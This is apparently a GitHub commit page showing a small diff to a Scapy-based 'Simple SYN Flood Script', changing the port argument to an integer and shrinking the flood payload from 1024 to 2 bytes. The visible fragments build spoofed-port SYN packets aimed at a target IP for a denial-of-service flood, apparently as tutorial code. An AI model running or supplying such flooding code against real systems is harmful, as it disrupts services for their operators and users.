We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
1 parent ac0ff47 commit 3105f40Copy full SHA for 3105f40
1 file changed
scapy/syn-flood/syn_flood.py
@@ -3,7 +3,7 @@
3
4
parser = argparse.ArgumentParser(description="Simple SYN Flood Script")
5
parser.add_argument("target_ip", help="Target IP address (e.g router's IP)")
6
-parser.add_argument("-p", "--port", help="Destination port (the port of the target's machine service, \
+parser.add_argument("-p", "--port", type=int, help="Destination port (the port of the target's machine service, \
7
e.g 80 for HTTP, 22 for SSH and so on).")
8
# parse arguments from the command line
9
args = parser.parse_args()
@@ -20,7 +20,7 @@
20
tcp = TCP(sport=RandShort(), dport=target_port, flags="S")
21
# add some flooding data (1KB in this case, don't increase it too much,
22
# otherwise, it won't work.)
23
-raw = Raw(b"X"*1024)
+raw = Raw(b"X"*2)
24
# stack up the layers
25
p = ip / tcp / raw
26
# send the constructed packet in a loop until CTRL+C is detected
0 commit comments